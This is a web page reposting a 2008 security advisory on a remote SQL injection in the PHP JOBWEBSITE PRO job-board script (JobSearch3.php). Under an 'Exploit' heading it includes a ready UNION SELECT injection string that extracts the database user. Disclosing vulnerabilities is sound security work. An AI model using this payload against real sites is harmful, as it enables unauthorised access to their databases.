Computer Security

Security Advisory: PHP JOBWEBSITE PRO (JobSearch3.php) SQL Injection Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  E-SMART CART (productsofcat.
asp) Remote SQL Injection Vulnerability

  Muitiple XSS - Glassfish Web Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )

  [ECHO_ADV_98$2008] Pre Ads Portal <= 2.0 Sql Injection Vulnerability

  [ECHO_ADV_97$2008] Pre News Manager <= 1.0 (index.php id) Sql Injection Vulnerability

From:Jose Luis Góngora Fernández <sys-project_(at)_hotmail.com>
Date:16.06.2008
Subject:PHP JOBWEBSITE PRO (JobSearch3.php) SQL Injection Vulnerability

[+] Info:

[~] Bug found by Jose Luis Gуngora Fernбndez (JosS)
[~] sys-project[at]hotmail.com
[~] http://www.spanish-hackers.com/
[~] Spanish Hackers Team - [SHT]
[~] EspSeC & Hack0wn!.

[~] Software: PHP JOBWEBSITE PRO (payment)
[~] HomePage: http://www.preproject.com/
[~] Exploit: Remote SQL Injection [High]
[~] Vuln file: JobSearch3.php

[~] /jobseekers/JobSearch3.php (search module)

[+] Exploit:

[~] ' and 1=2 union all select 1,2,3,4,5,user(),7,8,9,0,1,2,3,4,5/*

* In memory of rgod
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru